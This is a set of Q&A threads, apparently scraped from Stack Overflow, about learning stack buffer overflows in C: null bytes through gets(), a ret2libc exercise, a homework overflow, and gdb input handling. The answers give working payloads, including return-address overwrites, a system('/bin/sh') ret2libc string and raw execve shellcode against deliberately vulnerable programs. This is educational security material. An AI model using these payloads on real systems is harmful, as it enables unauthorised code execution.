Does gets() ignore '\0'? - c

I am learning about buffer overrun with this source code:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
return 0;
}
I try to write Null character ('\0') to buf variable.
First, in gdb, I set the breakpoint at line 6, after the gets() function and run it with r <<< $(python -c 'print "\0"*11 + "AAAA"')
When I explore the stack, I realize it only write "AAAA" to buf. What happens?
(gdb) x/16xw &buf
0xffffcf80: 0x41414141 0xffffd000 0xffffd04c 0x080484a1
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
But, when I run the program with r <<< $(python -c 'print "\1"*11 + "AAAA"'), the buf will be:
(gdb) x/16xw &buf
0xffffcf80: 0x01010101 0x01010101 0x41010101 0x00414141
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
So the gets() function will not receive the Null character or the stdin will ignore it ?
P/S: I built it with gcc -m32 -fno-stack-protector -g stack.c -o stack on gcc (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609.
Update: After some suggestions, I try this:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
for (int i = 0; i < 16; ++i) // this is for loop all the buf
{
printf("%02x ", buf[i]);
}
return 0;
}
It works with '\0'
$ gcc -g j_stack.c -o j_stack
$ python -c 'print "AAAA" + "\0"*6 + "AAAA"'| ./j_stack
buf # 0xffffcfbc
41 41 41 41 00 00 00 00 00 00 41 41 41 41 00 ffffffff
But how do I provide input which contains '\0' to buf in gdb program

No, it doesn't.
This behaviour has nothing to do with gets(), or with Python strings; it's due to the way you're providing input to your program, using a subshell and the Bash "herestring" syntax (which performs some manipulations on whatever you give it, apparently including dropping null bytes):
# python -c 'print "\0"*11 + "AAAA"' | wc -c
16
# python -c 'print "\0"*11 + "AAAA"' | hexdump
0000000 0000 0000 0000 0000 0000 4100 4141 0a41
0000010
# cat <<< $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
# hexdump <<< $(python -c 'print "\0"*11 + "AAAA"')
0000000 4141 4141 000a
0000005
# echo $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
If you run your program with a simple pipe, you should see the results you expect:
python -c 'print "\0"*11 + "AAAA"' | ./myProgram

No, gets does not ignore '\0'.
I changed your program to include
for(i = 0; i < 16; i++) printf("%02x", buf[i]);
printf("\n");
after calling gets. I ran the program on the input
abc\n
and saw
61626300000000000000000000000000
as I expected. I then ran the program on the input
ab\0c\n
and saw
61620063000000000000000000000000
which was also what I expected.
P.S. I'm not sure why you saw the behavior you did, but I confess I'm not sure what you're doing with <<< and those python fragments. Me, I used
echo abc | a.out
and
echo 616200630a | unhex | a.out
where unhex is a little program I have in my bin directory for, well, doing the obvious.

Related

ROP Buffer Overflow Exercise Issues

I'm doing this buffer overflow exercise and I can't seem to get it to work...
Under the Calling Arguments section of the article he exploits this program to use the variable not_used instead of /bin/date:
char* not_used = "/bin/sh";
void not_called() {
printf("Not quite a shell...\n");
system("/bin/date");
}
void vulnerable_function(char* string) {
char buffer[100];
strcpy(buffer, string);
}
int main(int argc, char** argv) {
vulnerable_function(argv[1]);
return 0;
}
He does this by getting not_used and the system#plt memory addresses, then replacing the stack with them:
| 0x8048580 <not_used> |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system> |
| 0x42424242 <fake old %ebp> |
| 0x41414141 ... |
| ... (0x6c bytes of 'A's) |
| ... 0x41414141 |
However, when I tried to do this, I just get a Segmentation Fault:
frinto#kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out
Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system#plt'
$1 = {<text variable, no debug info>} 0x56556050 <system#plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb)
Then I built my payload and ran it:
frinto#kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault
What could the issue be here? Thanks in advance for any help!
P.S. Memory randomization is disabled
If NX and ASLR is disabled, just do ret2libc, don't direct it to function not_called()
I found the string address of the not_used variable using IDA Pro :
String /bin/sh address = 0x08048530
system() address = 0xb7e36da0
Fake address = JUNK
Exploit :
`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
PoC :
% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the input gets(). We are not suppose to modify the code in any way, only create a malicious input that will create a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, it comes up saying "Value can't be converted to integer." I tried replacing esp to rsp because I am on a 64-bit but that came up with the same result. Is there a work around to this or another way to find the address of buf?
Since buf is pointing to an array of characters that are of length 12, inputing anything with a length greater than 12 should result in buffer overflow.
First, you need to find the offset to overwrite the Instruction pointer register (EIP).
Use gdb + peda is very useful:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now, you can overwrite the EIP register, the offset is 24 bytes. As in your homework just need print the "Gotcha!\n" string. Just jump to oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Make the exploit and got the results:
[manu#debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu#debian /tmp]$ ./bof < input
Gotcha!

GDB Debugging: Passing arguments using IO redirection

I am learning how to exploit a buffer overflow. Below is the program I am playing with
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[256];
printf("%p\n", buffer);
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
return 0;
}
I compile this program with: gcc -fno-stack-protector -z execstack program.c -o program
I loaded this program in gdb: gdb ./program
If I issue following command: run $(python -c 'print "A" * 3000') It will overwrite the registers as desired:
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffd938 0x7fffffffd938
r8 0x4141414141414141 0x4141414141414141
r9 0x4141414141414141 0x4141414141414141
r10 0x4141414141414141 0x4141414141414141
.....
But if I give arguments to the program using IO redirection registers' values are not overwritten as desired.
fuzz.py
#!/usr/bin/python
print 'A' * 3000
I output all 'A's to file f using fuzz.py > f
I run the program in gdb gdb ./program
Now If I give a argument to program using IO redirection I get abnormal output:
run < f
I get the following error:
Stopped reason: SIGSEGV
__strcpy_sse2_unaligned ()
at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:296
296 ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.
Why I am getting this error __strcpy_sse2_unaligned while if I pass arguments using run $(python -c 'print "A" * 3000') I will only get SIGSEGV error which I desired.
info registers:
rbp 0x7fffffffe4f0 0x7fffffffe4f0
rsp 0x7fffffffe3d8 0x7fffffffe3d8
r8 0x0 0x0
r9 0xf 0xf
r10 0x5d 0x5d
Why are the registers not overwritten by 'A's?
Q1)
Why are passing arguments in gdb using:
run $(python -c 'print "A" * 3000')
and
run < f
not equal? f is the file which contains 3000 'A's.
Q2)
What is the meaning of this error: __strcpy_sse2_unaligned ()
You are taking input from command line arguments, not the standard input:
strcpy(buffer, argv[1]);
So you should use:
run $(python -c 'print "A" * 3000')
The < redirection would work if you're reading from stdin, for example with scanf.
The __strcpy_sse2_unaligned SIGSEGV is caused by you trying to strcpy from uninitialized memory (argv[1], which is actually NULL since it's argv[argc] in your case). GDB then tries to find the source for that internal function, but fails.

Command line input to a C program (using 'print' command of Perl)

I am having difficulty in understanding the way print command of Perl interprets the hexadecimal values. I am using a very simple program of just 8 lines to demonstrate my question. Following code with gdb will explain my question in detail:
anil#anil-Inspiron-N5010:~/Desktop$ gcc -g code.c
anil#anil-Inspiron-N5010:~/Desktop$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list
1 #include <stdio.h>
2
3 int main(int argc, char* argv[])
4 {
5 int i;
6 for (i =0; i<argc; ++i)
7 printf ("%p\n", argv[i]);
8 return 0;
9 }
(gdb) break 8
Breakpoint 1 at 0x40057a: file code.c, line 8.
(gdb) run $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
Starting program: /home/anil/Desktop/a.out $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
0x7fffffffe35d
0x7fffffffe376
0x7fffffffe37b
Breakpoint 1, main (argc=3, argv=0x7fffffffdfe8) at code.c:8
8 return 0;
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
In above shown lines I have used gdb to debug the program. As command line arguments, I have passed two (hexadecimal) arguments (excluding the name of the program itself): \xdd\xcc\xbb\xaa and \xcc\xdd\xee\xff. Owing to the little-endian architecture, those arguments should be interpreted as 0xaabbccdd and 0xffeeddcc but as you can see the last line of above shown debugging shows 0xaabbccdd and 0xeeddcc00. Why is this so? What am I missing ?? This has happened with some other arguments too. I am requesting you to help me with this.
PS: 2^32 = 4294967296 and 0xffeeddcc = 4293844428 (2^32 > 0xffeeddcc). I don't know if still there is any connection.
Command-line arguments are NUL-terminated strings.
Arguments argv[1] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE376 DD CC BB AA 00
argv[2] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE37B CC DD EE FF 00
If you pay attention, you'll notice they happen to be located immediately one after the other in memory.
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
You asked to print two (32-bit) integers starting at argv[1]
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
----------- -----------
0xAABBCCDD 0xEEDDCC00
For x/2x to be correct, you would have needed to use
perl -e'print "\xdd\xcc\xbb\xaa\xcc\xdd\xee\xff"'
-or-
perl -e'print pack "i*", 0xaabbccdd, 0xffeeddcc'
For the arguments you passed, you need to use
(gdb) x argv[1]
0x3e080048cbd: 0xaabbccdd
(gdb) x argv[2]
0x3e080048cc2: 0xffeeddcc
You are confusing yourself by printing strings as numbers. In a little-endian architecture, in a four-byte value such as 0xDDCCBBAA, the bytes are numbered left-to-right from the starting address.
So let's take a look at the output of your debugger command:
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
Looking at that byte by byte, it would be:
0x7fffffffe376: dd
0x7fffffffe377: cc
0x7fffffffe378: bb
0x7fffffffe379: aa
0x7fffffffe37a: 00 # This NUL terminates argv[1]
0x7fffffffe37b: cc # This address corresponds to argv[2]
0x7fffffffe37c: dd
0x7fffffffe37d: ee
Which is not unexpected, no?
You might want to use something like this to display arguments in hex:
x/8bx argv[1]
(which will show 8 bytes in hexadecimal)

How to explain this buffer overflow vulnerability in C

Given this C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Built with:
gcc -m32 -z execstack prog.c -o prog
Given shell code:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
The program is exploitable with the commands:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
where I got the addresses from:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
I understand the meaning of the AAAA paddings in the middle, I calculated the 991 based on the length of buf in the program and the length of $EGG.
What I don't understand is why any of these addresses with call *%eax trigger the execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), what I don't understand is why this leads to jumping to the shellcode.
I got this far by reading Smashing the stack for fun and profit. But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled by why this more simple, alternative solution works, straight without guesswork.
The return value of strcpy is the destination (buf in this case) and that's passed using register eax. Thus if nothing destroys eax until main returns, eax will hold a pointer to your shell code.

Resources